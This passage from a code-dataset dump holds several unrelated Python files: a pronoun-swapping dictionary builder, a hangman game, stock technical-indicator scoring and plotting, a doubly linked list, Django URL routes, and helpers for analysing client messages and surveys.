that contains all of the pronouns\n pronounFile = open(file_path,\"r\")\n rawContents = pronounFile.read()\n\n # process the raw contents into pairs of pronouns\n pairs = processCorpus(rawContents)\n\n # add every pair to the dictionary\n pronounDict = dict()\n for pair in pairs:\n addPairToDict(pair, pronounDict)\n\n return pronounDict\n\n# processes the raw contents into ann array of pairs\n# INPUT: a string all the pronouns\n# OUTPUT: and nested array of pronoun pairs\ndef processCorpus(rawContents):\n\n # split the pairs by line\n unprocessedPairs = rawContents.split(\"\\n\")\n\n # split each word in pairs by commas\n pairs = []\n for pair in unprocessedPairs:\n pairs.append(pair.split(\",\"))\n\n return pairs \n\n# add a pair of pronouns to the dictionary\n# INPUT: an array of two pronouns, the pronoun dictionary\n# OUTPUT: \ndef addPairToDict(pair, pronounDict):\n bothWays = True\n\n # check to see if there's an extra element denoting the pair should only \n # be inputted one way\n if(len(pair) == 2):\n word1, word2 = pair\n elif(len(pair) == 3):\n word1, word2, holder = pair\n bothWays = False\n else:\n return\n\n # create dictionary entries one or both ways\n createEntries(word1, word2, pronounDict)\n if(bothWays):\n createEntries(word2, word1, pronounDict)\n\n# get the plural of a word\n# INPUT: a word\n# OUTPUT: the plural of that word\ndef getPlural(word):\n\n # if the word is a mr, mrs, etc, skip it\n if(word == \"mr\" or word == \"ms\" or word == \"mrs\"):\n return word\n\n # if the word ends in \"ss\", as in \"countess\", add \"es\"\n if(len(word) > 2 and (word[-2:] == \"ss\" or word[-2:] == \"SS\")):\n return word + \"es\"\n\n # otherwise just add \"s\"\n else:\n return word + \"s\"\n\n# enter different permutations of the word into the dictionary\n# INPUT: the word, its opposite gendered equivalent, the pronoun dictionary\n# OUTPUT: \ndef createEntries(word, oppword, pronounDict):\n\n \n # account for the word in different capitalizations\n words = [word, word.capitalize(), word.upper()]\n oppWords = [oppword, oppword.capitalize(), oppword.upper()]\n\n\n for i in range(len(words)):\n word = words[i]\n oppword = oppWords[i]\n pronounDict[word] = oppword\n\n # add the plural version of the word as well\n # make sure its uppercase if the rest of the word is\n if(i == len(words)-1):\n pronounDict[getPlural(word).upper()] = getPlural(oppword).upper()\n else:\n pronounDict[getPlural(word)] = getPlural(oppword)\n","sub_path":"genderbender/pronounDictMaker.py","file_name":"pronounDictMaker.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"513462342","text":"\"\"\"\nFile: hangman.py\nName: 林坤毅 Jordan\n-----------------------------\nThis program plays hangman game.\nUsers sees a dashed word, trying to\ncorrectly figure the un-dashed word out\nby inputting one character each round.\nIf the user input is correct, show the\nupdated word on console. Players have N_TURNS\nchances to try and win this game.\n\"\"\"\n\n\nimport random\n\n# This constant controls the number of guess the player has.\nN_TURNS = 7\n\n\ndef main():\n \"\"\"\n This program will first import a random word from Jerry's function 'random_word()'\n Second, it will show a hint contains only hyphens(-), which the number of hyphens will match the length of answer.\n Last, user can start playing the hangman game with only 7 choices to make mistake.\n \"\"\"\n answer = random_word()\n header(answer)\n input_ch(answer, N_TURNS)\n\n\ndef input_ch(answer, nturn):\n \"\"\"\n :param answer: str, the answer for this hangman game.\n :param nturn: the number of guesses left.\n \"\"\"\n x = old_word(answer)\n # temporary answer\n while True:\n result = 'no'\n input_ch = input('Your guess: ')\n finalinput = input_ch.upper()\n ch_or_not_ch = finalinput.isalpha()\n\n if ch_or_not_ch != True or len(finalinput) != 1:\n # format is wrong\n print('illegal format.')\n\n else:\n # format is right\n if nturn > 1:\n for ch in answer:\n if finalinput == ch:\n temp = replace(x, ch, answer)\n x = temp\n # change the temporary answer x\n result = 'yes'\n # setting 'result = yes' is for repeat characters in answer\n # If I add you are correct... here, it will repeat for the same character in answer\n\n if result == 'yes':\n if x == answer:\n print('You are correct!')\n print('You win!!')\n print('The word was: ' + answer)\n break\n print('You are correct!')\n print('The word looks like: ' + temp)\n print('You have ' + str(nturn) + ' guesses left.')\n\n else:\n nturn -= 1\n print('There is no ' + str(finalinput) + '\\'s in the word.')\n print('The word looks like:' + x)\n print('You have ' + str(nturn) + ' guesses left.')\n\n elif nturn == 1:\n print('There is no ' + str(finalinput) + '\\'s in the word.')\n print('You are completely hung :(')\n print('The word was: ' + answer)\n break\n\n\ndef replace(temporaryans, enterword, answer):\n \"\"\"\n :param temporaryans: str, temporary answer.\n :param enterword: str, the character that user guesses.\n :param answer: str, the answer for this hangman game.\n :return: str, the temporary answer after hyphens replacement.\n \"\"\"\n # s = replace('-----', 'A', answer)\n while True:\n i = answer.find(enterword)\n if i >= 0:\n y = temporaryans[:i]\n # ---\n y += enterword\n # ---A\n y += temporaryans[i+1:]\n # ---A-\n temporaryans = y\n answer = answer[:i] + '-' + answer[i+1:]\n else:\n ans = y\n break\n return ans\n\n\ndef old_word(answer):\n \"\"\"\n :param answer: str, the answer for this hangman game.\n :return: str, hyphens(-).\n \"\"\"\n ans = \"\"\n for i in range(len(answer)):\n ans += '-'\n return ans\n\n\ndef header(answer):\n \"\"\"\n :param answer: str, the answer for this hangman game.\n :return: str, Hints for the hangman game.\n \"\"\"\n n = \"\"\n for i in range(len(answer)):\n n = n + '-'\n print('The word looks like: ' + n)\n print('You have 7 guesses left.')\n\n\ndef random_word():\n num = random.choice(range(9))\n if num == 0:\n return \"NOTORIOUS\"\n elif num == 1:\n return \"GLAMOROUS\"\n elif num == 2:\n return \"CAUTIOUS\"\n elif num == 3:\n return \"DEMOCRACY\"\n elif num == 4:\n return \"BOYCOTT\"\n elif num == 5:\n return \"ENTHUSIASTIC\"\n elif num == 6:\n return \"HOSPITALITY\"\n elif num == 7:\n return \"BUNDLE\"\n elif num == 8:\n return \"REFUND\"\n\n##### DO NOT EDIT THE CODE BELOW THIS LINE #####\nif __name__ == '__main__':\n main()\n","sub_path":"stanCode_Projects/hangman_game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433677216","text":"#Given: Type of TI and the relevant data for that particular TI\n#Output: A Strength Estimate for the TI on a range of -10 to +10\n#Meanwhile: Plot bhi kar lo us ko\n#data format : {'Date':np.array, 'Open':np.array, 'High':np.array 'Low':np.array, 'Close':np.array }\nimport talib\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport plotly.plotly as py\nimport plotly.graph_objs as go \nimport plotly.tools as tools\nimport plotly.io as pio\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\n\ndef generate_freq_dist(data):\n\tret = plt.hist(data,bins=20,density=True,stacked = True)\n\t# print (ret)\n\t# plt.show()\n\treturn ret\n\ndef get_strength_EMA(data):\n\t#Exponential Moving Average applied on closing prices. Only default value of timeperiod used for now.\n\top = talib.EMA(data['Close'])\n\n\t#plot\n\tlist_traces = []\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op, name = 'momentum histogram'))\n\tlist_traces.append(go.Candlestick(\n\t\tx=data['Date'],\n\t\topen = data['Open'],\n\t\thigh = data['High'], \n\t\tlow = data['Low'], \n\t\tclose = data['Close'], \n\t\t)\n\t)\n\t# list_traces.append(go.Candlestick(\n\t# \tx=data['Date'][450:],\n\t# \topen = data['Open'][450:],\n\t# \thigh = data['High'][450:], \n\t# \tlow = data['Low'][450:], \n\t# \tclose = data['Close'][450:],\n\t# \tincreasing = dict(\n\t# \t\tfillcolor = 'blue'),\n\t# \tdecreasing = dict(\n\t# \t\tfillcolor = 'white')\n\t# \t))\n\tfig = go.Figure(data = list_traces)\n\tplot(fig)\n\n\top = np.array(op)\n\tfinite_diff = np.diff(op)\n\tprint (finite_diff)\n\t# score = finite_diff[-1] * 10 / max(abs(np.nanmax(finite_diff)), abs(np.nanmin(finite_diff)))\n\tscore = finite_diff[-1]\n\tif score > 10:\n\t\tscore = 10\n\telif score < -10:\n\t\tscore = -10\n\treturn score,fig\n\ndef get_strength_DEMA(data):\n\treturn get_strength_EMA(data)\n\ndef get_strength_WILLR(data):\n\t#WILLR = (Highest Hgh - Close)/(Highest High - Lowest Lowest)\n\top = talib.WILLR(data['High'],data['Low'], data['Close'])\n\n\t#plot\n\tlist_traces=[]\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op, name = 'Williams %R'))\n\tfig = go.Figure(data=list_traces)\n\tplot(fig)\n\n\t\n\t#+5 for WILLR < -80 \n\t#-5 for WILLR > -20\n\t#+5 for both price and indicator going up\n\t#-5 for both price and indicator going down\n\tscore = 0\n\tclosing_price = np.array(data['Close'])\n\top = np.array(op)\n\tif (closing_price[-1] < -80):\n\t\tscore += 5\n\telif(closing_price[-1] > -20):\n\t\tscore += -5\n\tif (closing_price[-1] - closing_price[-2] > 0):\n\t\tif(op[-1] - op[-2] > 0):\n\t\t\tscore += 5\n\telif(closing_price[-1] - closing_price[-2] < 0):\n\t\tif(op[-1] - op[-2] < 0):\n\t\t\tscore += -5\n\n\treturn score,fig\n\ndef get_strength_RSI(data):\n\t'''\n\t1)if current price is on the rise, we look for most recent maxima and last two minimas. \n\t\tif the most recent maxima and the current value form a +ve slope, Add +5 to the score, \n\t\tif the last two minimas form a +ve slope, add +5\n\t2)\n\t'''\ndef get_strength_ADX(data):\n\top = np.array(talib.ADX(data['High'], data['Low'], data['Close']))\n\tplus_DI = np.array(talib.PLUS_DI(data['High'], data['Low'], data['Close']))\n\tminus_DI = np.array(talib.MINUS_DI(data['High'], data['Low'], data['Close']))\n\t\n\t#plots\n\tlist_traces = []\n\tlist_traces.append(go.Scatter(x=data['Date'], y=op, name= 'ADX'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y=plus_DI, name= '+DI'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y=minus_DI, name= '-DI'))\n\tfig = go.Figure(data=list_traces)\n\tplot(fig)\n\n\t#score calculation\n\tscore=0\n\tif (op[-1]>20):\n\t\tif(plus_DI[-1] > minus_DI[-1]):\n\t\t\tscore = (op[-1]-20)*1.5\n\t\t\tif score>10:\n\t\t\t\tscore = 10\n\t\telse:\n\t\t\tscore = (op[-1]-20)*-1.5\n\t\t\tif score<-10:\n\t\t\t\tscore = -10\n\treturn score,fig\n\ndef get_strength_MACD(data):\n\t#we need only the close data for MACD analysis\n\top = talib.MACD(data['Close'])\n\thist = np.array(op[2]);\n\n\t#Get the MACD plot. \"Intend to later: add the pricing chart above the macd chart\"\n\tlist_traces=[]\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[0], name = 'macd'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[1], name = 'signal line'))\n\tlist_traces.append(go.Bar(x=data['Date'], y= op[2], name = 'momentum histogram'))\n\tfig = go.Figure(data=list_traces)\n\n\tplot(fig)\n\n\t# print (data['Date'][np.nanargmax(np.array(op[2]))])\n\tminm = np.nanmin(hist)\n\tmaxm = np.nanmax(hist)\n\t\n\t#separating the positive and negative values\n\t#from the histogram obtained from the MACD calculation\n\tpositives = []\n\tnegatives = []\n\tfor t in hist:\n\t\tif t>0 and not np.isnan(t):\n\t\t\tpositives.append(t)\n\t\telif not np.isnan(t):\n\t\t\tnegatives.append(t)\n\tpositives = np.array(positives)\n\tnegatives = np.array(negatives)\n\tprint (len(positives),len(negatives))\n\n\tpositive_freq_dist = generate_freq_dist(positives)\n\tnegative_freq_dist = generate_freq_dist(negatives)\n\n\tfor i in range(len(positive_freq_dist[0])):\n\t\tif(positive_freq_dist[0][i]>0.015) and i!=0:\n\t\t\tmaxm = positive_freq_dist[1][i]\n\n\tfor i in range(len(negative_freq_dist[0])):\n\t\tif(negative_freq_dist[0][-1 + -1*i] > 0.015):\n\t\t\tminm = negative_freq_dist[1][-1 + -1*i]\n\n\n\tif hist[-1]>=0:\n\t\tcurrent_score = hist[-1]*10/maxm\n\t\tif current_score>10:\n\t\t\tcurrent_score = 10\n\telse:\n\t\tcurrent_score = hist[-1]*-10/minm\n\t\tif current_score <-10:\n\t\t\tcurrent_score = -10\n\n\tprint ('curr score = ' + str(current_score))\n\treturn current_score,fig\n\n\ndef get_strength_BBANDS(data):\n\n\top = talib.BBANDS(data['Close'])\n\ttp = (data['High'] + data['Low'] + data['Close'])/3.0\n\n\tlist_traces=[]\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[0], name = 'macd'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[1], name = 'signal line'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[2], name = 'momentum histogram'))\n\tlist_traces.append(go.Candlestick(x=data['Date'],open = data['Open'], high = data['High'], low = data['Low'], close = data['Close']))\n\tfig = go.Figure(data=list_traces)\n\tplot(fig)\n\ttp = np.array(tp)\n\top = np.array(op)\n\tstrength = 0\n\tif tp[-1] > op[1][-1]:\n\t\tstrength = (op[1][-1] - tp[-1])*10/(op[0][-1] - op[1][-1])\n\telse:\n\t\tstrength = (tp[-1] - op[1][-1])*10/(op[2][-1] - op[1][-1])\n\tprint (strength)\n\treturn strength,fig\t\t\t\n\n\ndef plot_candlestick(stockData):\n\tohlc=stockData.getOhlc()\n\ttrace_cs = go.Ohlc(x=ohlc['Date'],\n\t open=ohlc['Open'],\n\t high=ohlc['High'],\n\t low=ohlc['Low'],\n\t close=ohlc['Close'], name='Candlestick Pattern')\n\n\tdata = [trace_cs]\n\tfig = go.Figure(data=data)\n\tplot(fig)\n\ndef get_ti_strength(ti_name,data):\n\t# try:\n\tscore,fig = eval('get_strength_' + ti_name)(data)\n\tprint (score)\n\t# plot(fig,output_type = 'div', filename = temp_div)\n\t# plot_candlestick(data)\n\treturn score,plot(fig,\n include_plotlyjs=False,\n output_type='div')\n\t# except:\n\t# \tprint (e)\n\t# \tprint ('Invalid Technical Indicator')\n\n\n# data = pd.read_csv('TCS.BO.csv',usecols=['Date','Open', 'High', 'Low', 'Close']);\n# # print (data)\n# get_ti_strength('EMA',data)","sub_path":"functions/strength_ti.py","file_name":"strength_ti.py","file_ext":"py","file_size_in_byte":6825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"4224951","text":"\n\nclass DoublyLinkedListNode:\n def __init__(self, x, p= None,n= None):\n self.val = x\n self.prev = p\n self.next = n\n\n\n# Definition for ListNode\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\ndef doublyLinkedCircularList(head):\n\n curr = head\n prev = None\n headDouble = DoublyLinkedListNode(0)\n tailDouble = headDouble\n #new list\n\n\n while curr:\n newNode = DoublyLinkedListNode(curr.val, tailDouble, None)\n tailDouble.next = newNode\n tailDouble = newNode\n curr = curr.next\n \n headDouble = headDouble.next\n if headDouble:\n tailDouble.next = headDouble\n headDouble.prev = tailDouble\n \n return headDouble\n\n\ndef main():\n \n head = ListNode(0)\n tail = head\n for i in [1,2,3,4,5,6]:\n tail.next = ListNode(i)\n tail = tail.next\n\n hd = doublyLinkedCircularList(head)\n\n curr = hd\n for i in range(10):\n print(curr.val, end = '->')\n curr = curr.next\n print()\n # print('---------')\n curr = hd\n for i in range(10):\n print(curr.val, end = '->')\n curr = curr.prev\n\n\nif __name__ == '__main__':\n main()","sub_path":"doublyLinkedList_crio.py","file_name":"doublyLinkedList_crio.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"181608267","text":"\nfrom django.urls import path,include\nfrom . import views\napp_name='blog'\nurlpatterns = [\n\n path('', views.all_blog, name='all_blogs'),\n path('/', views.detail, name='detail'),\n path('somehtml',views.somehtml,name='some')\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343996947","text":"# encode=utf-8\nimport urllib.request\nimport lxml\n\nurl = 'https://talent.baidu.com/baidu/web/httpservice/userCheckLogin'\n# url = 'https://www.baidu.com'\nurl_agent = ''\nresponse = urllib.request.urlopen(url)\nhtml = response.read();\nprint('html = %s' % html)\n\n\n\n","sub_path":"urltest.py","file_name":"urltest.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481902987","text":"from django.urls import path\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nfrom .views import (\n UserInfoDetailView, UserInfoUpdateView, UserInfoListView,\n SignUpView, AddToFriendsView,\n)\n\napp_name = 'users'\n\nurlpatterns = [\n path('', UserInfoListView.as_view(), name='user_list'),\n path('/', UserInfoDetailView.as_view(), name='user_detail'),\n path('/edit/', UserInfoUpdateView.as_view(), name='user_edit'),\n path('add-to-friends/', AddToFriendsView.as_view(), name='add_to_friends'),\n path('signup/', SignUpView.as_view(), name='signup'),\n path('login/', LoginView.as_view(), name='login'),\n path('logout/', LogoutView.as_view(), name='logout'),\n]\n","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426981492","text":"# collection of functions to use for analysis\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom sklearn.utils import resample\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport matplotlib.pyplot as plt\n\nimport datefinder as datefi\nimport regex as re\n\nfrom textblob import TextBlob\n\n# ***** some common constants ************\n\nfname_messages = 'messages.csv'\nfname_surveys = 'surveys.csv'\nfname_outbound_topic_model = 'lda_outbound_topic_model.sav'\nfname_inbound_topic_model = 'lda_inbound_topic_model.sav'\n\nn_samples = 2000 # parameters for topic modeling\nn_features = 1000\nn_components = 15\nn_top_words = 10\n\ndate_pattern = r'\\b(?i)(?<=date|court|report|on|for)\\s*(\\S+\\s*\\S+\\s*\\S+\\s*\\S+\\s*\\S+)'\naddress_pattern = r'(?i)(?<=\\blocated|\\bat[\\s*])([0-9]{1,}.*?MD)(\\s[0-9]{5})?'\nphone_pattern = r'(\\+\\d{1,2}\\s)?\\(?\\d{3}\\)?[\\s.-]?\\d{3}[\\s.-]?\\d{4}'\n\n# ***** functions to load data and apply timezone ************\n\ndef apply_tz(df,col_name,tz_read='UTC',tz_target='US/Eastern'):\n \"\"\" Function to convert to a target timezone. \"\"\"\n df[col_name] = df[col_name].dt.tz_localize(tz_read).dt.tz_convert(tz_target)\n return df\n\ndef make_hour_day(df,col_name):\n \"\"\" Function to extract weekday and hour from a time field. \"\"\"\n df['weekday'] = df[col_name].dt.weekday\n df['weekday_name'] = df[col_name].dt.weekday_name\n df['hour'] = df[col_name].dt.hour\n return df\n\ndef rows_missing(df1,df2,col_name):\n \"\"\" Function to find rows that are not in two data frames.\n Uses the pd.merge(...,indicator=True) option. \"\"\"\n df_out = pd.merge(df1,df2,on=col_name,how='left',indicator=True).query('_merge == \"left_only\"')\n return df_out\n\ndef load_messages(fname):\n messages = pd.read_csv(fname, parse_dates=['created_at','send_at','client_created_at'])\n messages = apply_tz(messages,'created_at',tz_read='Etc/GMT-7',tz_target='US/Eastern')\n messages = apply_tz(messages,'send_at',tz_read='Etc/GMT-7',tz_target='US/Eastern')\n messages = apply_tz(messages,'client_created_at',tz_read='Etc/GMT-7',tz_target='US/Eastern')\n return messages\n\ndef load_surveys(fname):\n surveys = pd.read_csv(fname, parse_dates=['survey_created_at'])\n surveys = apply_tz(surveys,'survey_created_at',tz_read='Etc/GMT-7',tz_target='US/Eastern')\n return surveys\n\ndef load_surveys_single(fname):\n \"\"\" Loads survey data with single responses. \"\"\"\n surveys = load_surveys(fname)\n surveys['survey_created_at'] = surveys['survey_created_at'].apply(lambda x: x.round('s'))\n surveys_single = (surveys\n .groupby(['client_id','user_id'])[['survey_created_at']]\n .nunique()\n .rename(columns={'survey_created_at':'ncounts'})\n .query('ncounts == 1')\n .reset_index())\n return pd.merge(surveys_single.drop('ncounts',axis=1),surveys,on=['client_id','user_id'],how='left')\n\ndef map_surveys_to_sf(surveys_in):\n surveys = surveys_in.copy()\n surveys['supervision_failure'] = (surveys['survey_response_id'].map({1:False,2:True,3:True,4:True}))\n return surveys\n\n\n# ***** functions for basic processing ************\n\ndef calc_number_messages_exchanged(messages):\n \"\"\" Gives the number of messages sent and received. \"\"\"\n msg_outbound = (messages.query('inbound == False')\n .groupby(['client_id','user_id'])[['id']]\n .count())\n msg_inbound = (messages.query('inbound == True')\n .groupby(['client_id','user_id'])[['id']]\n .count())\n \n msg_exchanged = pd.concat([msg_outbound,msg_inbound],axis=1).fillna(0)\n msg_exchanged.columns = ['counts_outbound','counts_inbound']\n msg_exchanged['inout_ratio'] = msg_exchanged['counts_inbound'] / msg_exchanged['counts_outbound']\n \n # handle cases with outbound = 0\n msg_exchanged[np.isinf(msg_exchanged['inout_ratio'])] = 0.0\n \n return msg_exchanged\n\ndef find_dates_in_string(string,pattern,tz_info,show_result=False):\n \"\"\" Extract possible dates from a text string.\n Also, must add time zone information from corresponding sent message.\"\"\"\n\n # make sure input is string\n if not isinstance(string,str):\n return []\n \n string_matches = re.findall(pattern, string)\n dates_ext = []\n for match in string_matches:\n if show_result: print(match)\n date_matches = datefi.find_dates(match)\n # since the returned date is of type datetime.datetime,\n # need to convert to Timestamp format for comparison\n # also limit years to UNIX time\n for date_match in date_matches:\n if (date_match.year > 1970) & (date_match.year < 2038):\n if show_result: print(date_match, date_match.timestamp())\n dates_ext.append(pd.Timestamp(date_match.timestamp(),unit='s',tz=tz_info))\n return dates_ext\n\ndef find_dates_in_row(row):\n row['dates_ext'] = find_dates_in_string(row['body'],date_pattern,row['send_at'].tzinfo)\n return row\n\ndef compare_dates(string,string_target):\n \"\"\" Compare dates, drop times less than the target.\n Also, drop times that are 30 days into the future. \"\"\"\n sext = []\n for s in string:\n if (s >= string_target) & (s <= string_target+pd.Timedelta(days=30)):\n sext.append(s)\n return sext\n\ndef compare_dates_in_row(row):\n return [compare_dates(row['dates_ext'],row['send_at'])]\n\ndef find_addresses_in_string(string,pattern):\n addresses = []\n\n # make sure input is string\n if not isinstance(string,str):\n return addresses\n \n string_matches = re.findall(pattern,string)\n for match in string_matches:\n addresses.append(match[0]+match[1])\n\n return addresses\n\ndef find_addresses_in_row(row):\n return [find_addresses_in_string(row['body'],address_pattern)]\n\ndef map_word_exist(string,word_str):\n \"\"\" Indicate if the word exists. \"\"\"\n pattern = '(?i)'+word_str\n pattern_raw = r'%s'%pattern\n return 1 if len(find_pattern_in_string(string,pattern_raw)) else 0\n\ndef find_pattern_in_string(string,pattern):\n str_matches = []\n \n # make sure input is string\n if not isinstance(string,str):\n return str_matches\n \n matches = re.findall(pattern,string)\n for match in matches:\n str_matches.append(match)\n \n return str_matches\n\ndef find_pattern_in_row(row,pattern):\n return [find_pattern_in_string(row['body'],pattern)]\n\ndef find_phones_in_row(row):\n return [find_pattern_in_string(row['body'],phone_pattern)]\n\ndef convert_to_hr(dfin,col_name,col_target_name):\n \"\"\" Converts timestamp into hours. Used for plotting and modeling. \"\"\"\n df = dfin.copy()\n df[col_target_name] = (df[df[col_name].notnull()][col_name]\n /pd.Timedelta(hours=1))\n return df\n\ndef convert_to_log(dfin,col_name,col_target_name):\n \"\"\" Take the natural logarithm of the input column. \"\"\"\n df = dfin.copy()\n df[col_target_name] = df[col_name].apply(lambda x: np.log(x + 1.e-4))\n return df\n\ndef calc_messages_counts(messages,col_name='send_at'):\n \"\"\" Calculates message counts per relationship per weekday and hour of day.\n Depends on the time input column. \"\"\"\n messages_time = messages[['id','client_id','user_id','send_at','inbound']]\n messages_time = make_hour_day(messages_time.copy(),col_name)\n messages_inbound_counts = (messages_time.query('inbound == True')\n .drop('inbound',axis=1)\n .groupby(['client_id','user_id','weekday','hour'])[[col_name]]\n .count()\n .rename(columns={col_name:'inbound_msg_counts'}))\n \n messages_outbound_counts = (messages_time.query('inbound == False')\n .drop('inbound',axis=1)\n .groupby(['client_id','user_id','weekday','hour'])[[col_name]]\n .count()\n .rename(columns={col_name:'outbound_msg_counts'}))\n\n messages_counts = pd.concat([messages_inbound_counts,messages_outbound_counts],axis=1).fillna(0).reset_index()\n \n return messages_counts\n\ndef calc_messages_counts_sum(messages):\n messages_counts = calc_messages_counts(messages,col_name='send_at')\n return messages_counts.groupby(['client_id','user_id'])[['inbound_msg_counts','outbound_msg_counts']].sum()\n\ndef count_words_per_group(messages,pattern):\n return messages['body'].apply(lambda x: 1 if len(find_pattern_in_string(x,pattern)) else 0).sum()\n\ndef count_messages_with_pattern(messages,pattern):\n \"\"\" Count messages with a specific pattern. \"\"\"\n wordcounts = messages.groupby(['client_id','user_id']).apply(lambda x: count_words_per_group(x,word_pattern))\n return pd.DataFrame(wordcounts,columns=['msg_word_counts'],index=wordcounts.index)\n\ndef exclude_elem(x,to_exclude):\n return False if (x in to_exclude) else True\n\ndef include_elem(x,to_include):\n return True if (x in to_include) else False\n\ndef exclude_from_list(x,to_exclude):\n \"\"\" Removes elements given a list. \"\"\"\n return [s for s in filter(lambda y: exclude_elem(y,to_exclude), x)]\n\n# ***** functions dealing with response times ************\n\ndef calc_median_response_time_diff_per_group(messages):\n \"\"\" Calculates the median time difference between\n sent and received messages. Need to improve on the time calculation. \"\"\"\n \n # reset index to apply operation within group\n messages = messages.sort_values('send_at',ascending=True).reset_index(drop=True)\n \n # loop over all messages send dates\n tdiff = []\n for i in range(len(messages)):\n #print(i,messages.loc[i,['inbound','send_at']])\n if i == 0:\n date_prev = messages.loc[i,'send_at']\n stat_prev = messages.loc[i,'inbound']\n if stat_prev != messages.loc[i,'inbound']:\n tdiff.append(messages.loc[i,'send_at'] - date_prev)\n date_prev = messages.loc[i,'send_at']\n stat_prev = messages.loc[i,'inbound']\n\n return [np.median(tdiff),np.amax(tdiff)] if tdiff else [pd.NaT,pd.NaT]\n\ndef calc_median_response_time_diff_all(messages):\n \"\"\" Calculates the median response time per relationship. \"\"\"\n median_response_time = messages.groupby(['client_id','user_id']).apply(calc_median_response_time_diff_per_group)\n return pd.DataFrame(median_response_time.values.tolist(),columns=['median_response_time','max_response_time'],index=median_response_time.index)\n\n# The following paired functions can be combined!\ndef calc_median_response_time_user_to_client(messages):\n \"\"\" Calculates the median response times from user to client. \"\"\"\n messages = messages.sort_values('send_at',ascending=True).reset_index(drop=True)\n \n tdiff = []\n date_prev = pd.NaT\n for i in range(len(messages)):\n if messages.loc[i,'inbound'] == True:\n date_prev = messages.loc[i,'send_at']\n if (messages.loc[i,'inbound'] == False) & (not pd.isna(date_prev)):\n tdiff.append(messages.loc[i,'send_at'] - date_prev)\n date_prev = pd.NaT\n \n return [np.median(tdiff), np.amax(tdiff)] if tdiff else [pd.NaT, pd.NaT]\n\ndef calc_median_response_time_client_to_user(messages):\n \"\"\" Calculates the median response times from client and user. \"\"\"\n messages = messages.sort_values('send_at',ascending=True).reset_index(drop=True)\n \n tdiff = []\n date_prev = pd.NaT\n for i in range(len(messages)):\n if messages.loc[i,'inbound'] == False:\n date_prev = messages.loc[i,'send_at']\n if (messages.loc[i,'inbound'] == True) & (not pd.isna(date_prev)):\n tdiff.append(messages.loc[i,'send_at'] - date_prev)\n date_prev = pd.NaT\n \n return [np.median(tdiff), np.amax(tdiff)] if tdiff else [pd.NaT, pd.NaT]\n\ndef calc_median_response_time_diff(messages):\n \"\"\" Calculates the median response time per relationship.\n Distinguishes between use to client and client to user. \"\"\"\n median_response_time_user_to_client = messages.groupby(['client_id','user_id']).apply(calc_median_response_time_user_to_client)\n median_response_time_client_to_user = messages.groupby(['client_id','user_id']).apply(calc_median_response_time_client_to_user)\n median_response_time_user_to_client = pd.DataFrame(median_response_time_user_to_client.values.tolist(),\n columns=['uc_median_response_time','uc_max_response_time'],\n index=median_response_time_user_to_client.index)\n median_response_time_client_to_user = pd.DataFrame(median_response_time_client_to_user.values.tolist(),\n columns=['cu_median_response_time','cu_max_response_time'],\n index=median_response_time_client_to_user.index)\n return pd.concat([median_response_time_user_to_client,median_response_time_client_to_user],axis=1)\n\n# ***** functions dealing with response times (old functions) ************\n\ndef calc_median_response_time_per_group(df,grp_names):\n \"\"\" Apply a function per defined group. Written for grp_names=['client_id','user_id'] \"\"\"\n df_grp = df.groupby(grp_names)\n time_diff_key = []\n time_diff_val = []\n for key,group in df_grp:\n tval = calc_median_response_time_per_relation(group)\n time_diff_key.append(key)\n time_diff_val.append(tval)\n return pd.DataFrame(\n pd.Series(time_diff_val,index=pd.MultiIndex.from_tuples(time_diff_key,names=grp_names)),\n columns=['median_time'])\n\ndef calc_median_response_time_per_relation(df_uc):\n \"\"\" Calculates the median time per defined relation. \"\"\"\n if df_uc['time_diff_response'].notnull().any():\n tval = df_uc['time_diff_response'].median()\n else:\n tval = np.nan\n return tval\n\ndef find_index_outbound(df):\n index_inbound = df.query('inbound == True').index.values # find inbound indices\n # need to iterate backwards until find entry with 'inbound == False'\n index_outbound = []\n for n in index_inbound:\n for k in range(n, - 1, -1):\n if (df.loc[k,'inbound'] == False) & (df.loc[k,'sent'] == True):\n #print(k,df.loc[k,'inbound'])\n break\n index_outbound.append(k)\n return index_inbound, np.array(index_outbound)\n\ndef get_response_timelag(df):\n \"\"\" Calculates the time lag between sent and received message. \"\"\"\n # function requires index manipulation, hence .reset_index is called,\n # which is not ideal with groupby\n df = df.sort_values('send_at').reset_index(drop=True)\n index_inbound, index_outbound = find_index_outbound(df)\n df['time_diff_response'] = pd.Series(df.loc[index_inbound,'send_at'].values - df.loc[index_outbound,'send_at'].values,\n index=index_inbound)\n return df\n\ndef calc_median_response_time(df):\n \"\"\" Calculates time difference per relation. \"\"\"\n col_select = ['id','client_id','user_id','body','inbound','send_at','sent']\n messages_time_diff = (df[col_select].groupby(['client_id','user_id'])\n .apply(get_response_timelag)\n .reset_index(drop=True))\n return 